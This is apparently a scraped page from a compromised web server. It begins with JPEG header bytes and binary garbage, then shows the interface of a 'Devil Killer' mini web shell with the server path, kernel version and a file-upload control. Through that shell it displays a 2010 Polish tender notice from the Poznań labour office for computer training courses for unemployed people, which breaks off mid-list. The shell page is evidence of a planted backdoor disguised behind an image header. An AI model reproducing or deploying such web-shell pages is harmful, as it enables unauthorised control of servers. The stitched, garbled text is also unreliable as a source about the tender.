JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100402/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100402/92674-N-2010.html

<p class="kh_header"><b>Poznań: Usługi polegające na przeprowadzeniu szkoleń:
1.	OBSŁUGI KOMPUTERA - PAKIET BIUROWY (OD PODSTAW)
2.	OBSŁUGI KOMPUTERA I INTERNETU OD PODSTAW
3.	OBSŁUGI KOMPUTERA - PAKIET MS OFFICE (ZAAWANSOWANY)
dla osób bezrobotnych i poszukujących pracy.</b><br>
<b>Numer ogłoszenia: 92674 - 2010; data zamieszczenia: 02.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Czarnieckiego 9, 61-538 Poznań, woj. wielkopolskie, tel. 061 8345640, 8345688, faks 061 8339808.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.poznan.pl; www.bip.pup.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi polegające na przeprowadzeniu szkoleń:
1.	OBSŁUGI KOMPUTERA - PAKIET BIUROWY (OD PODSTAW)
2.	OBSŁUGI KOMPUTERA I INTERNETU OD PODSTAW
3.	OBSŁUGI KOMPUTERA - PAKIET MS OFFICE (ZAAWANSOWANY)
dla osób bezrobotnych i poszukujących pracy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są Usługi polegające na przeprowadzeniu szkoleń:
Część 1 

CPV - 80533100-0
Przedmiotem zamówienia jest przeprowadzenie szkolenia obsługi komputera - program biurowy (od podstaw) dla maksymalnie 36 osób bezrobotnych i poszukujących pracy skierowanych w dwóch grupach liczących 16 - 18 uczestników, przy czym zajęcia powinny być prowadzone równolegle w 8-9 grupach.
Szkolenie pierwszej planujemy uruchomić w kwietniu 2010 roku, a szkolenie drugiej grupy powinno zostać przeprowadzone do końca września 2010 roku.
Na szkolenie będą kierowane osoby z wykształceniem co najmniej średnim ogólnym lub zawodowym, posiadające doświadczenie zawodowe na stanowiskach biurowo - administracyjnych lub w księgowości, z tym, że w większości od dłuższego czasu nie pracujące. 
Zainteresowani jesteśmy, aby program szkolenia obejmował około 120 godzin lekcyjnych zajęć i uwzględniał:
- środowisko Windows,
- edytor tekstów WORD,
- arkusz kalkulacyjny EXCEL,
- INTERNET (łączenie się, wyszukiwanie i ściąganie informacji, wysyłanie i odbiór poczty elektronicznej),
- obsługę urządzeń cyfrowych przetwarzających wizję i fonię,
- programy użytkowe do obsługi sklepów i magazynów, fakturowanie (Symfonia, Subiekt),
 -praktyczną obsługę urządzeń biurowych typu: fax, centrala telefoniczna, kserokopiarka, bindownica, laminator,
- zajęcia w zakresie umiejętności poszukiwania i uzyskiwania zatrudnienia (około 10 godz.).
Jednocześnie informujemy, że zgodnie z art. 40 ust 4 ustawy o promocji zatrudnienia i instytucjach rynku pracy organizowane dla osób bezrobotnych szkolenia w formie kursu powinny obejmować przeciętnie nie mniej niż 30 godzin zegarowych zajęć tygodniowo.
Istotnym warunkiem zamówienia jest:
-samodzielne stanowisko komputerowe dla każdego uczestnika szkolenia,
-prowadzenie zajęć codziennie w dni robocze, w wymiarze około 8 godzin lekcyjnych,
-prowadzenie zajęć równolegle w dwóch grupach liczących po 8 - 9 osób,
-możliwość szkolenia w zakresie obsługi urządzeń biurowych,
-wydanie zaświadczenia o ukończeniu szkolenia zawierającego wykaz przedmiotów objętych szkoleniem z podaniem liczby godzin.

Część 2 

CPV - 80533100-0
Przedmiotem zamówienia jest przeprowadzenie szkolenia obsługi komputera i internetu od podstaw dla maksymalnie 20 osób bezrobotnych i poszukujących pracy skierowanych w dwóch grupach liczących po 8-10 uczestników.
Szkolenie pierwszej grupy planujemy uruchomić w maju 2010 roku, a szkolenie drugiej grupy powinno zostać przeprowadzone do końca września 2010 roku.
Na szkolenie będą kierowane osoby z wykształceniem minimum podstawowym wykazujące się aktywnością w poszukiwaniu pracy. 
Zainteresowani jesteśmy, aby program szkolenia obejmował maksymalnie 120 godzin lekcyjnych zajęć i uwzględniał:
- środowisko Windows,
- edytor tekstów WORD,
- arkusz kalkulacyjny EXCEL,
- INTERNET (łączenie się, wyszukiwanie i ściąganie informacji, wysyłanie i odbiór poczty elektronicznej),
- obsługę urządzeń cyfrowych przetwarzających fonię i wizję,
- zajęcia w zakresie umiejętności poszukiwania i uzyskiwania zatrudnienia (około 10 godz.).
Jednocześnie informujemy, że zgodnie z art. 40 ust 4 ustawy o promocji zatrudnienia i instytucjach rynku pracy organizowane dla osób bezrobotnych szkolenia w formie kursu powinny obejmować przeciętnie nie mniej niż 30 godzin zegarowych zajęć tygodniowo.
Istotnym warunkiem zamówienia jest:
- samodzielne stanowisko komputerowe dla każdego uczestnika szkolenia,
- prowadzenie zajęć codziennie w dni robocze, w wymiarze około 8 godzin lekcyjnych, 
- wydanie zaświadczenia o ukończeniu szkolenia zawierającego wykaz przedmiotów objętych szkoleniem z podaniem liczby godzin.

Część 3 

CPV - 80533100-0
Przedmiotem zamówienia jest przeprowadzenie szkolenia obsługa komputera  PAKIET MS Office (zaawansowany) dla maksymalnie 36 osób bezrobotnych lub poszukujących pracy skierowanych w dwóch grupach liczących po 16-18 osób, przy czym zajęcia powinny być prowadzone równolegle w 8-9 osobowych grupach.
Szkolenie pierwszej grupy planujemy uruchomić w maju 2010roku, a szkolenie drugiej grupy powinno być przeprowadzone do końca września 2010roku.
Zainteresowani jesteśmy, aby program szkolenia obejmował, maksymalnie 120 godzin lekcyjnych i uwzględniał: edytor tekstów WORD, arkusz kalkulacyjny EXCEL, bazę danych ACCESS, inne programy z zakresu pakietu MS OFFICE (np. Front Page, Power Paint, Project) oraz program graficzny.
Jednocześnie informujemy, że zgodnie z art. 40 ust 4 ustawy o promocji zatrudnienia i instytucjach rynku pracy organizowane dla osób bezrobotnych szkolenia w formie kursu powinny obejmować przeciętnie nie mniej niż 30 godzin zegarowych zajęć tygodniowo.
Istotnym warunkiem zamówienia jest:
-sprawdzanie umiejętności kandydatów na szkolenie w zakresie obsługi komputera - program Word i Excel, u Zleceniodawcy,
-samodzielne stanowisko komputerowe dla każdego uczestnika szkolenia,
-prowadzenie zajęć równolegle w dwóch grupach liczących po 8 - 9 osób,
-prowadzenie zajęć codziennie w dni robocze, w wymiarze około 7-8 godzin lekcyjnych, 
-wydanie zaświadczenia o ukończeniu szkolenia zawierającego wykaz przedmiotów objętych szkoleniem z podaniem liczby godzin..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wraz z ofertą Wykonawcy złożą oświadczenie o spełnieniu warunków, dotyczących: 
1)posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień,
2)posiadania wiedzy i doświadczenia,
3)dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
4)sytuacji ekonomicznej i finansowej;
W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega 	wykluczeniu:
1)oświadczenie o nie podleganiu wykluczeniu, z przyczyn o których mowa w art.24 ustawy Prawo zamówień publicznych (załącznik nr 5)
2)aktualne zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych wydane przez Wojewódzki Urząd Pracy.
3)aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż sześć miesięcy przed upływem terminu składania oferty
4)pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.

Ocena spełniania warunków nastąpi w oparciu o prawidłowość złożonych dokumentów i oświadczeń wg formuły: spełnia-nie spełnia. Wykonawcy, którzy nie spełniają warunków określonych w SIWZ zostaną wykluczeni z postępowania, a ich oferty zostaną odrzucone.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada wiedzę i doświadczenie:
1)wykaz wykonanych usług w zakresie niezbędnym do wskazania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem składania oferta, a  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania wraz z dokumentem potwierdzającym należyte wykonanie usługi (np. referencje - udzielone przez odbiorców innych niż Zamawiający, chyba, ze Wykonawca realizował podobne usługi tylko dla Zamawiającego).(załącznik nr 1 SIWZ, część II Karty kursu - pn. Doświadczenie w prowadzeniu ww. szkolenia)
Zamawiający uzna, że Wykonawca posiada niezbędne doświadczenie jeżeli wskaże, iż w ciągu trzech lat Wykonawca przeprowadził przynajmniej jeden kurs grupowy o podobnej tematyce dla min. 10 osób i przedstawi dokument o należytym wykonaniu usługi (np. referencje).
Ocena spełniania warunku nastąpi w oparciu o prawidłowość złożonych dokumentów i oświadczeń wg formuły: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada odpowiedni potencjał techniczny:
1)wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnch wykonawcy w celu realizacji zamówienia (załącznik nr 1 SIWZ, część IV Karty kursu - pn. Miejsce realizacji - warunki lokalowe)
Ocena spełniania warunku nastąpi w oparciu o prawidłowość złożonych dokumentów i oświadczeń wg formuły: spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada osoby zdolne do wykonania zamówienia:
1)wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji, wykształcenia, doświadczenia zawodowego, przygotowania i doświadczenia pedagogicznego, wraz z informacjami o zakresie wykonywania przez nie czynności (załącznik nr 1 SIWZ, część III Karty kursu - pn. Kadra pedagogiczna)
Ocena spełniania warunku nastąpi w oparciu o prawidłowość złożonych dokumentów i oświadczeń wg formuły: spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Karta kursu( załącznik nr 1 SIWZ, cześć I, V i VI Karty kursu) 2. Program szkolenia (załącznik nr 2 SIWZ) uwzględniający w szczególności: 1) nazwę i zakres szkolenia, 2) czas trwania i sposób organizacji zajęć, 3) wymagania wstępne dla uczestników szkolenia, 4) cele szkolenia, 5) plan nauczania z podaniem liczby godzin określający tematy zajęć edukacyjnych oraz ich wymiar z uwzględnieniem części teoretycznej i praktycznej, 6) treści szkolenia w zakresie poszczególnych zajęć edukacyjnych, 7) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, 8) sposób sprawdzania efektów szkolenia. 3. Wzór dokumentu o ukończeniu szkoleniu. 4. Propozycje materiałów szkoleniowych. 5. Zaparafowany przez Wykonawcę wzór umowy (załącznik nr 3 SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zleceniodawca dopuszcza możliwość dokonania zmiany postanowień zawartej umowy w stosunku do: terminu wykonania zamówienia, liczby uczestników, kosztów za osobę uczestniczącą w szkoleniu, sposobu odpłatności za wykonanie zamówienia, jeżeli konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. 2.Wszelkie zmiany umowy wymagają formy pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pup.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Poznaniu, 61-538 Poznań Pwilon obok budynku głównego, pok.1, w godz. 8:00 - 14:00...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2010 godzina 12:00, miejsce: Powiatowy Urząd Pracy w Poznaniu, 61-538 Poznań pok.104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia obsługi komputera - program biurowy (od podstaw) dla maksymalnie 36 osób bezrobotnych i poszukujących pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia obsługi komputera - program biurowy (od podstaw) dla maksymalnie 36 osób bezrobotnych i poszukujących pracy skierowanych w dwóch grupach liczących 16 - 18 uczestników, przy czym zajęcia powinny być prowadzone równolegle w 8-9 grupach.
Szkolenie pierwszej planujemy uruchomić w kwietniu 2010 roku, a szkolenie drugiej grupy powinno zostać przeprowadzone do końca września 2010 roku.
Na szkolenie będą kierowane osoby z wykształceniem co najmniej średnim ogólnym lub zawodowym, posiadające doświadczenie zawodowe na stanowiskach biurowo - administracyjnych lub w księgowości, z tym, że w większości od dłuższego czasu nie pracujące. 
Zainteresowani jesteśmy, aby program szkolenia obejmował około 120 godzin lekcyjnych zajęć i uwzględniał:
- środowisko Windows,
- edytor tekstów WORD,
- arkusz kalkulacyjny EXCEL,
- INTERNET (łączenie się, wyszukiwanie i ściąganie informacji, wysyłanie i odbiór poczty elektronicznej),
- obsługę urządzeń cyfrowych przetwarzających wizję i fonię,
- programy użytkowe do obsługi sklepów i magazynów, fakturowanie (Symfonia, Subiekt),
- praktyczną obsługę urządzeń biurowych typu: fax, centrala telefoniczna, kserokopiarka, bindownica, laminator,
- zajęcia w zakresie umiejętności poszukiwania i uzyskiwania zatrudnienia (około 10 godz.).
Jednocześnie informujemy, że zgodnie z art. 40 ust 4 ustawy o promocji zatrudnienia i instytucjach rynku pracy organizowane dla osób bezrobotnych szkolenia w formie kursu powinny obejmować przeciętnie nie mniej niż 30 godzin zegarowych zajęć tygodniowo.
Istotnym warunkiem zamówienia jest:
-samodzielne stanowisko komputerowe dla każdego uczestnika szkolenia,
-prowadzenie zajęć codziennie w dni robocze, w wymiarze około 8 godzin lekcyjnych,
-prowadzenie zajęć równolegle w dwóch grupach liczących po 8 - 9 osób,
-możliwość szkolenia w zakresie obsługi urządzeń biurowych,
-wydanie zaświadczenia o ukończeniu szkolenia zawierającego wykaz przedmiotów objętych szkoleniem z podaniem liczby godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia obsługi komputera i internetu od podstaw dla maksymalnie 20 osób bezrobotnych i poszukujących pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia obsługi komputera i internetu od podstaw dla maksymalnie 20 osób bezrobotnych i poszukujących pracy skierowanych w dwóch grupach liczących po 8-10 uczestników.
Szkolenie pierwszej grupy planujemy uruchomić w maju 2010 roku, a szkolenie drugiej grupy powinno zostać przeprowadzone do końca września 2010 roku.
Na szkolenie będą kierowane osoby z wykształceniem minimum podstawowym wykazujące się aktywnością w poszukiwaniu pracy. 
Zainteresowani jesteśmy, aby program szkolenia obejmował maksymalnie 120 godzin lekcyjnych zajęć i uwzględniał:
- środowisko Windows,
- edytor tekstów WORD,
- arkusz kalkulacyjny EXCEL,
- INTERNET (łączenie się, wyszukiwanie i ściąganie informacji, wysyłanie i odbiór poczty elektronicznej),
- obsługę urządzeń cyfrowych przetwarzających fonię i wizję,
- zajęcia w zakresie umiejętności poszukiwania i uzyskiwania zatrudnienia (około 10 godz.).
Jednocześnie informujemy, że zgodnie z art. 40 ust 4 ustawy o promocji zatrudnienia i instytucjach rynku pracy organizowane dla osób bezrobotnych szkolenia w formie kursu powinny obejmować przeciętnie nie mniej niż 30 godzin zegarowych zajęć tygodniowo.
Istotnym warunkiem zamówienia jest:
- samodzielne stanowisko komputerowe dla każdego uczestnika szkolenia,
- prowadzenie zajęć codziennie w dni robocze, w wymiarze około 8 godzin lekcyjnych, 
- wydanie zaświadczenia o ukończeniu szkolenia zawierającego wykaz przedmiotów objętych szkoleniem z podaniem liczby godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia obsługa komputera  PAKIET MS Office (zaawansowany) dla maksymalnie 36 osób bezrobotnych lub poszukujących pracy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia obsługa komputera  PAKIET MS Office (zaawansowany) dla maksymalnie 36 osób bezrobotnych lub poszukujących pracy skierowanych w dwóch grupach liczących po 16-18 osób, przy czym zajęcia powinny być prowadzone równolegle w 8-9 osobowych grupach.
Szkolenie pierwszej grupy planujemy uruchomić w maju 2010roku, a szkolenie drugiej grupy powinno być przeprowadzone do końca września 2010roku.
Zainteresowani jesteśmy, aby program szkolenia obejmował, maksymalnie 120 godzin lekcyjnych i uwzględniał: edytor tekstów WORD, arkusz kalkulacyjny EXCEL, bazę danych ACCESS, inne programy z zakresu pakietu MS OFFICE (np. Front Page, Power Paint, Project) oraz program graficzny.
Jednocześnie informujemy, że zgodnie z art. 40 ust 4 ustawy o promocji zatrudnienia i instytucjach rynku pracy organizowane dla osób bezrobotnych szkolenia w formie kursu powinny obejmować przeciętnie nie mniej niż 30 godzin zegarowych zajęć tygodniowo.
Istotnym warunkiem zamówienia jest:
-sprawdzanie umiejętności kandydatów na szkolenie w zakresie obsługi komputera - program Word i Excel, u Zleceniodawcy,
